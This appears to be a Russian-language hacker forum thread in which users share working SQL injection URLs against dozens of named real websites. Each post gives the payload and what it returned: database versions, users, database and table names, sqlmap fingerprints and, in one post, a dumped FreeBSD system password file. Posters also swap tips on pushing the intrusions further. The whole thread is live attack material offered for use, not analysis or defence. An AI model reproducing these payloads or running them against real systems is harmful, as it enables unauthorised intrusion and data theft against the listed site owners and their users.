Code: http://www.pangea-tour.ru/cities.php?id=-201+union+select+1,database(),3,@@version,5,6,7,8,9--&Spid=45 5.5.44-1+wheezy1+mh1-log u21941_8 u21941 u21941_2 u21941_astra u21941_tsls
East Coast Trail | Scenic and Unique Hiking and Walking Trails in Newfoundland and Labrador, Canada – Welcome to the East Coast Code: http://eastcoasttrail.ca/trail/view.php?id=3%20/*!50000union*/%20distinct%20select%20version(),2,3,4,5,6,7,8,9--+f 5.5.45-cll-lve ТИЦ10 PR5
Code: http://abendblatt.ergebnisdienst-fussball.de/index.php?liga=2511 (GET) Parameter: liga (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: liga=2511 AND 1436=1436 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: liga=2511 AND (SELECT * FROM (SELECT(SLEEP(5)))oChU) --- back-end DBMS: MySQL 5.0.12 Подкиньте жиров.
Code: http://www.mondanionline.com/valutazione-officine_panerai_panerai_ref__6152/1-36.php?lingua=it%20OR%20(SELECT%20COUNT(*)%20FROM%20(SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%2063),%20FLOOR(RAND(0)*2)))%20-- 5.6.25-log После запроса, код остается в куках. Code: http://www.onionring.co.uk/article.asp?NID=411%20OR%20(SELECT%20COUNT(*)%20FROM%20(SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%2063),%20FLOOR(RAND(0)*2)))%20-- 5.5.29-log Code: http://en.chinapanda.org.cn/topic.php?id=5%20OR%20(SELECT%20COUNT(*)%20FROM%20(SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%2063),%20FLOOR(RAND(0)*2)))%20-- 5.6.27 Code: http://alicekwartler.com/product-info.php?id=-1750+UnIon+selECt+1,2,3,4,5,6,@@version,8,9,10,11,12,13+--+ 5.0.96-log
Code: http://www.uralopera.ru/showperson.php?id=-1 union all select 1,version(),3,4,5,6,7,8,9,10,11,12 5.5.46-MariaDB-1~wheezy-log 3 ТИЦ425 Code: http://www.autoconsulting.ua/news.php?catid=-1 union all select version(),2,3,4,5,6,7,8 and '0'='0 autoconsulting@localhost 5.5.40-log ТИЦ325 YC(R4) PR4 Code: http://wciom.ru/index.php?id=236&uid=-1 union all select 1,2,3,4,5,6,version()-- 5.5.38 ТИЦ4300 PR6 Code: http://sipaero.ru/post.php?id=-1 union all select 1,user(),database(),version(),5,6,7,8,9 admin_sipaero@localhost admin_sipaero 5.1.73
Code: http://www.affordablesound.com/productlist.php?id=version() Code: http://www.calais-shopping.com/fiche.php?id=9999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 5.1.73-0ubuntu0.10.04.1-log в исходе Code: http://www.hotrodwelding.nl/product.php?id=9999.9' union all select 1,2,3,version(),5,6,7,8,9 and '0'='0 5.5.22-log Code: http://www.annam.com.hk/menu-causeway-bay.php?id=-6748' UNION ALL SELECT NULL,NULL,NULL,NULL,version(),NULL,NULL,NULL-- - 5.5.45-cll-lve
Code: http://www.jiteli.info/altai?fio=%F6%FC%25%27+and+adress+LIKE+%27%25%27+union+select+version%28%29,version%28%29+limit+1+--+s&adress=&searchButton=+%CD%E0%E9%F2%E8+ 5.5.47
Code: http://www.casco.com.ru/index.php?contentID=741 --- Parameter: contentID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: contentID=741' AND 2149=2149 AND 'bXwR'='bXwR Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (SELECT) Payload: contentID=741' OR (SELECT * FROM (SELECT(SLEEP(5)))qEJY) AND 'XZHa' ='XZHa --- web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) web application technology: Apache 2.2.14 back-end DBMS: MySQL 5.0.12 ............................................................................................ Code: http://www.avongorge.org.uk/aboutus.php?ContentID=1'+and(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1 5.0.87-b20 Code: http://www.steelers.co.nz/steelers/index.php?contentid=9999.9+union+all+select+1,2,(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),4,5,6,7,8,9,10 '=~=5.5.34-MariaDB-cll-lve=~=1' Code: http://www.lostroveroscriollos.com/video.php?contentID=-3859 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,version(),NULL,NULL,NULL,NULL-- - 5.1.30 Code: http://www.mkungl.com/2/d.php?contentID=(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) '=~=5.1.67-rel14.3=~=1' Code: http://waddleviolins.com/index.php?contentID=86' UNION ALL SELECT NULL,NULL,NULL,version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - 5.1.73-cll Code: http://www.uisp.it/torino2/index.php?contentId=18+or+1=(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1 PR5 AlexaRank 100,405 Code: http://www.erpug.org/index.php?contentID=-1' union all select 1,2,3,4,5,6,7,8,9,10,version(),12,13,14 and '0'='0 5.5.47-MariaDB-1~wheezy
Code: www.fba-labs.com/index.php?contentid=1' union all select database(),version(),3,4 and '0'='0 fbalabs_admin@localhost fbalabs_cms 5.5.48-cll http://www.strengholt.nl/musicgroup/content.php?menuid=27 or 1=-1 union all select version(),database()-- 5.5.38-0ubuntu0.14.04.1 Strbv_strnl http://www.dswbrand.com/flash_detail.php?id=-1 union all select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 5.1.73-log http://iram-institute.org/EN/content-page.php?ContentID=-1' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,database(),18,19,20,version(),22,23,24,25,26,27,28,29,30 and '0'='0 5.0.45 webdb http://www.areatattoo.com/flash_detail.php?id=-1' union all select 1,2,version(),4 and '0'='0 5.5.41
Code: http://www.bestrent.fi/en/book-now.php?id=9999.9 union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 5.1.65 http://www.infantaria-paintball.com.br/loja/sessoes.asp?id=26'+and(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1 5.0.45-community-nt http://www.badboysafloat.com.au/product_details.php?id=9999.9 union all select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16 10.0.20-MariaDB-cll-lve http://www.attaapparels.com/shop.php?id=9999.9 union all select 1,2,3,version(),5,6,7,8,9,10,11,12 5.5.44-log http://www.kabelindo.co.id/readnews.php?id=(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) 10.1.13-MariaDB
Code: http://relax-nk.ru/rub.php?id=1 union all select @@version,2 5.5.47 http://janno.net/shop_.php?id=-1 union all select 1,@@version,3,4,5,6 5.5.48-cll 3 http://www.flundra.com/shop2.php?id=-1 union all select 1,2,@@version,4,5,6,7,8 5.5.29-log www.powermanager.co.kr/bbs/shop_.php?cno=2 --- Parameter: cno (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cno=2) AND 2160=2160 AND (1973=1973 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: cno=2) AND (SELECT * FROM (SELECT(SLEEP(5)))doLu) AND (4537=4537 --- web application technology: PHP 5.3.13 back-end DBMS: MySQL 5.0.12 Database: powermgcok http://www.suriyanar.com/pay.php?Id=-1 union all select 1,@@version,3,4,5 5.1.73-cll http://www.vidspoke.com/buy.php?id=-1+union+all+select(select+concat(ifnull(version(),char(32)))+) 5.5.45-cll-lve http://depolamp.ru/buy.php?id=-1 union all select 1,@@version,3,4,5,6,7,8,9 5.1.73 http://www.zeogames.net/game.php?id=6 --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6 AND 7494=7494 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=6 AND (SELECT * FROM (SELECT(SLEEP(5)))CLTv) --- web application technology: Nginx back-end DBMS: MySQL 5.0.12
Code: http://www.slavsandtatars.com/about.php?id=-1 union all select version(),2,3 5.0.96-log http://som.adzu.edu.ph/newsupdates/index.php?id=-1 union all select 1,version(),3,4,5,6 10.1.13-MariaDB http://www.nbrri.gov.ng/sites/news.php?ID=2 --- Parameter: ID (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ID=2 RLIKE (SELECT (CASE WHEN (3724=3724) THEN 2 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl ause (EXTRACTVALUE) Payload: ID=2 AND EXTRACTVALUE(5424,CONCAT(0x5c,0x7162627871,(SELECT (ELT(54 24=5424,1))),0x716b707871)) Type: AND/OR time-based blind Title: MySQL <= 5.0.11 AND time-based blind (heavy query) Payload: ID=2 AND 2237=BENCHMARK(5000000,MD5(0x62517868)) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: ID=2 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162627871,0x46487573 62567161566d4179414257704d724d756c625169636f5542656367737266756b76504469,0x716b7 07871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- web application technology: Apache 2.4.18, PHP 5.5.31 back-end DBMS: MySQL 5.1 http://www.tidytowns.ie/interior.php?id=2 --- Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=2' AND (SELECT * FROM (SELECT(SLEEP(5)))PeRi) AND 'kKhu'='kKhu --- back-end DBMS: MySQL 5.0.12 http://www.putridflowers.com/music.php?id=(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) 5.5.43-37.2-log
Code: http://www.component-asu.ru/catalog.php?tp=1' union all select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- - 5.5.34-32.0-log ================================================================================================================= https://www.fairradio.com/catalog.php?mode=view&categoryid=214 --- Parameter: categoryid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: mode=view&categoryid=214') AND 9239=9239 AND ('bsAX'='bsAX Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: mode=view&categoryid=214') AND (SELECT * FROM (SELECT(SLEEP(5)))Ximv) AND ('zqOE'='zqOE --- web application technology: Apache, PHP 5.2.17 back-end DBMS: MySQL 5.0.12 available databases [2]: [*] fairrad_radio [*] information_schema ================================================================================================================= http://www.dataapex.com/catalog.php?catCategory=1 --- Parameter: catCategory (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: catCategory=1 AND (SELECT * FROM (SELECT(SLEEP(5)))MTXx) --- web server operating system: Linux Debian 7.0 (wheezy) web application technology: PHP 5.4.45, Apache 2.2.22 back-end DBMS: MySQL 5.0.12 ================================================================================================================= http://dnepr-auto.dp.ua/catalog.php?id=1'+and(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1 5.5.41-0+wheezy1 + XSS ================================================================================================================= http://jewelfox.ru/catalog.php?catId=ard --- Parameter: catId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: catId=ard' AND 5559=5559 AND 'QhzR'='QhzR Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: catId=ard' AND (SELECT * FROM (SELECT(SLEEP(5)))Jqzn) AND 'dkLD'='dkLD --- web application technology: PHP 5.3.29 back-end DBMS: MySQL 5.0.12 Database: jewelfo9_db73544m [32 tables] +-------------------+ | arrival_list | | arrival_list_lot | | basket | | box | | business | | category | | defect | | delivery | | favorites | | logistics | | lots | | motion | | motion_logistics | | motion_lot | | order_tao | | order_tao_comment | | order_tao_lots | | orders | | partCategory | | payment | | privilege | | purchase | | recovery | | requirement | | role | | role_privilege | | store | | store_location | | topMenu | | user_location | | user_role | | users | +-------------------+ ================================================================================================================= http://www.int.nsk.su/tech.php?id=1 union all select 1,user(),version(),4,5,database() logosolinf_hleb 5.6.28-76.1-log logosolinf_hleb@localhost ================================================================================================================= http://www.sinoshop.ru/catalog.php?pid=1 union all select 1,2,version(),4,5,6,7,8,9 4.0.24_Debian-10sarge3-log
Code: http://tvoy-soblazn.ru/catalog.php?cat=9&sid=120&sid=-118+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,version(),54,55,56,57,database(),59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74-- rentaproject_szn 5.0.82-log 7
Code: http://www.dealigg.com/index.php?page=2&category=ApparelShoes (GET) Parameter: category (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=2&category=ApparelShoes' AND 9810=9810 AND 'aHPZ'='aHPZ Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: page=2&category=ApparelShoes' AND (SELECT 9690 FROM(SELECT COUNT(*),CONCAT(0x716a716b71,(SELECT (ELT(9690=9690,1))),0x71706a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rueO'='rueO Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: page=2&category=ApparelShoes' OR SLEEP(5) AND 'YOBs'='YOBs Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: page=2&category=-4553' UNION ALL SELECT CONCAT(0x716a716b71,0x786943664e5a70716c6e7a71727a774b55506a74774f78446271567a747359757950414548467768,0x71706a7171)-- - --- web application technology: PHP 5.4.16 back-end DBMS: MySQL 5.0 available databases [3]: [*] dealdb [*] information_schema [*] test А то все мелочь и мелочь!
RWD, раскручивайте вручную. Code: http://www.dealigg.com/index.php?page=2&category=-ApparelShoes'+and+extractvalue(1,concat(0x3a,(user())))+--+
Current User: root@localhost Code: http://www.lafinancepourtous.com/quiz/admin/xml.php?id=2 (GET) Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=2 AND 2870=2870 Type: error-based Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED) Payload: id=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a707671,(SELECT (ELT(1622=1622,1))),0x717a706a71,0x78))s), 8446744073709551610, 8446744073709551610))) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=2 AND SLEEP(5) --- web application technology: Apache back-end DBMS: MySQL >= 5.5 Current DB: lafinancepourtousquiz Data Base Found: information_schema Data Base Found: grand_quiz Data Base Found: lafinancepourtous Data Base Found: lafinancepourtousgame Data Base Found: lafinancepourtousquiz Data Base Found: mysql Data Base Found: performance_schema Data Base Found: phpmyadmin Data Base Found: portail Data Base Found: preprod # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ # root:*:0:0:Charlie &:/root:/bin/csh daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin mysql:*:88:88:MySQL Daemon:/home/mysql:/usr/sbin/nologin admin:*:1001:1001:User &:/home/admin:/bin/sh pgsql:*:70:70:PostgreSQL Daemon:/usr/local/pgsql/pgsql:/bin/sh spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin vscan:*:110:110:Scanning Virus Account:/var/amavis:/bin/sh dovecot:*:143:143:Dovecot User:/var/empty:/usr/sbin/nologin cyrus:*:60:60:the cyrus mail server:/nonexistent:/usr/sbin/nologin mailowner:*:1003:1003:User &:/home/mailowner:/usr/sbin/nologin webapps:*:1004:1004:User &:/home/webapps:/sbin/nologin mailman:*:91:91:Mailman Owner:/home/mailman:/sbin/nologin nfrance:*:1006:1006:User &:/home/nfrance:/bin/sh mrtg:*:279:1001:MRTG daemon:/nonexistent:/sbin/nologin stats:*:1008:1009:User &:/home/stats:/sbin/nologin nagios:*:181:181:Nagios pseudo-user:/var/spool/nagios:/sbin/nologin dovenull:*:144:144:Dovecot login User:/var/empty:/usr/sbin/nologin iefp2:*:1009:1010:utilisateur:/home/users/iefp2:/bin/ftponly iefp3:*:1010:1011:utilisateur:/home/users/iefp3:/usr/local/bin/bash mail1001:*:1011:1012:utilisateur:/home/users/mail1001:/usr/sbin/nologin mail1005:*:1012:1013:utilisateur:/home/users/mail1005:/usr/sbin/nologin mail1010:*:1013:1014:utilisateur:/home/users/mail1010:/usr/sbin/nologin mail1015:*:1014:1015:utilisateur:/home/users/mail1015:/usr/sbin/nologin mail1018:*:1016:1017:utilisateur:/home/users/mail1018:/usr/sbin/nologin mail1020:*:1017:1018:utilisateur:/home/users/mail1020:/usr/sbin/nologin mail1024:*:1018:1019:utilisateur:/home/users/mail1024:/usr/sbin/nologin mail1026:*:1019:1020:utilisateur:/home/users/mail1026:/usr/sbin/nologin mail1022:*:1020:1021:utilisateur:/home/users/mail1022:/usr/sbin/nologin mail1029:*:1021:1022:utilisateur:/home/users/mail1029:/usr/sbin/nologin mail1017:*:1022:1023:utilisateur:/home/users/mail1017:/usr/sbin/nologin mail1025:*:1023:1024:utilisateur:/home/users/mail1025:/usr/sbin/nologin mail1006:*:1024:1025:utilisateur:/home/users/mail1006:/usr/sbin/nologin mail1003:*:1025:1026:utilisateur:/home/users/mail1003:/usr/sbin/nologin mail1012:*:1026:1027:utilisateur:/home/users/mail1012:/usr/sbin/nologin mail1027:*:1027:1028:utilisateur:/home/users/mail1027:/usr/sbin/nologin mail1028:*:1028:1029:utilisateur:/home/users/mail1028:/usr/sbin/nologin mail1002:*:1029:1030:utilisateur:/home/users/mail1002:/usr/sbin/nologin mail1019:*:1030:1031:utilisateur:/home/users/mail1019:/usr/sbin/nologin mail1030:*:1031:1032:utilisateur:/home/users/mail1030:/usr/sbin/nologin mail1031:*:1032:1033:utilisateur:/home/users/mail1031:/usr/sbin/nologin vnstat:*:284:284:vnStat Network Monitor:/nonexistent:/usr/sbin/nologin current user: 'atame_@localhost' Code: http://lacuerda.net:80/Enlaces/index.php?cid=9 (GET) Parameter: cid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=9 AND 7978=7978 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: cid=9 AND (SELECT 2945 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(2945=2945,1))),0x716a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: cid=9 AND SLEEP(5) --- web application technology: Apache, PHP 5.4.42 back-end DBMS: MySQL >= 5.0 available databases [4]: [*] information_schema [*] lc_comunidad [*] lc_dbase [*] lc_topsites Code: http://www.owk.cz:80/philosophy-operation/whoweare/subject.php?id=1 (GET) Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 5266=5266 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=1 AND SLEEP(5) --- web server operating system: Linux Debian 6.0 (squeeze) web application technology: PHP 5.3.3, Apache 2.2.16 back-end DBMS: MySQL >= 5.0.12
Code: http://www.dalnoboivideo.ru/page.php?id=-118'+union+select+1,version(),3,4+--+ версия: 5.6.28-1+wheezy1+mh2-log таблицы: adv,adv_places,pages,places,users,videos поля users: id,login,password,city,mail,ip,date_reg,priv админки не нашел и все что с этим связанно.((((
